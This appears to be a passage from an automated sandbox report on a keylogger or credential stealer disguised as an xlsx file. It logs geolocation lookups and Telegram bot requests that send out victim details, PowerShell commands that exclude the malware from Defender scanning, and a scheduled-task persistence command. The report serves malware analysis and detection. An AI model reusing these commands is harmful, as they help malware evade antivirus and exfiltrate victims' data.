2024-10-07 12:52:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49800	188.114.96.3	443	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:30 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 12:52:30 UTC	678	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61885 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6wMxE59ru6eF9Mvuku%2F5e8DqP%2FHhLOXeAo5WKP3ltMPJc7iTHQzNwhpZQEvSSSwJqbfapIfNMz%2FP2qzpBAwp45anYqDvBoDcCX%2BdWdxNE47BA1777GCBqahNb2IiDHnepR0467cO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee07593db95590-EWR
2024-10-07 12:52:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49812	188.114.96.3	443	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:31 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 12:52:31 UTC	684	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61886 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TSn8Gzl%2FeZexXOxC4k5ZlQayorXmo%2FFSCVvBVbMf2eM6vb4fUemun3WML7ey1svdpWHPny1mbVdgiOfmhyeTt%2Be%2BsPtqC%2FW1XKzjTA0CGyZx%2BpMZ5agE8AzaxRYK%2FYYcvE72ugW3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee0760b883c34f-EWR
2024-10-07 12:52:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49813	188.114.96.3	443	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:31 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 12:52:31 UTC	680	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61886 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QSIiktgBvo1u9I%2B1boaWGmOwmA20%2FIvbyQXakWs2Nb6tvr0lv9GKF0oNJWezKcKzGM748tiqq4rK5kAJBNcHBLmEJM3O%2FWE%2FkrOFbkEcqSGFwVpcgtlaIVH%2FpT8px8AvQN9DWEHm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee07616cfb4358-EWR
2024-10-07 12:52:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49823	188.114.96.3	443	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:32 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 12:52:32 UTC	710	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61887 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ATmXH3qmWEVZhxdFOmAKshN5fkREMj8R%2FoX4u4nQQ2w33Ut1ILJTtrZFcpO%2FOUDLzHq%2Bj3%2FTmJdEbKlRsbnolKRwZRNSsziYC8Y1WuQbJJB%2BCsrkbP2KBVHKweKcv2YpxUcHj541"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee07687dc6422d-EWR alt-svc: h3=":443"; ma=86400
2024-10-07 12:52:32 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49826	188.114.96.3	443	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:32 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 12:52:33 UTC	682	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61887 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QyNuEprn%2FT68hs1QPs5QzL8PML901yVJ6m7ZounDXjQzrUcC9h%2BZPD%2FUbAICkel%2F%2BW66FQ8XB5EFprOB7XT1n9KXnpp6KXKghc%2Bd89HOgzfKGq5sZEiqfWS30uZZOkWTBG5RMQcD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee0769be77c32f-EWR
2024-10-07 12:52:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49828	149.154.167.220	443	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:33 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2020:57:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-07 12:52:33 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 12:52:33 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 12:52:33 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49839	188.114.96.3	443	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:34 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 12:52:34 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:34 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61889 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=99k9Oia71J0%2FGRylYMQiPdhF3Npe47KJNBFlb1YNI0bWrNX50CsUE4C3fXcLf8SbUeE%2Fb3Qh4vVIPj51H4t5SxzpVRG8ozRr2O45A03Fw47T2X5V1PWc7VbStrip5iJ8jQ6S40oG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee0774deb143bb-EWR
2024-10-07 12:52:34 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49850	188.114.96.3	443	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:35 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 12:52:36 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61890 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fePwghk6RuqCFgpoCOkZUNKS%2FHaDZDl6IWrlDtUgraQV3Pau1dasfrM5heHKrZh20QHTCEeB%2BWtBtBuyoTzfAlrolEO7h8q5RZDXAVo0EirmpEuqRcZfB28%2B8yqOTmA0xZQXc1Hl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee077cde553300-EWR
2024-10-07 12:52:36 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49868	188.114.96.3	443	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:37 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 12:52:37 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:37 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61892 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PEdV4cWFxeXmKfxqwcfCMOfofAwIMcwkAXUhURzUS9uX5XWvWqH3CIce2z1ooANN13Y72mXY8sG%2FYpyf4iByVmrN9OyJ9T%2F%2FDBdkiskW7rHozUbMV6tjcmvQU444z9SqXcdmpLlf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee07884aa80f73-EWR
2024-10-07 12:52:37 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49871	149.154.167.220	443	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:38 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:07:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-07 12:52:38 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 12:52:38 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 12:52:38 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	08:52:17
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Imagebase:	0xff0000
File size:	686'592 bytes
MD5 hash:	2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:52:19
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Imagebase:	0x790000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:52:19
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:52:19
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
Imagebase:	0x790000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:52:19
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:52:19
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp"
Imagebase:	0xce0000
File size:	187'904 bytes
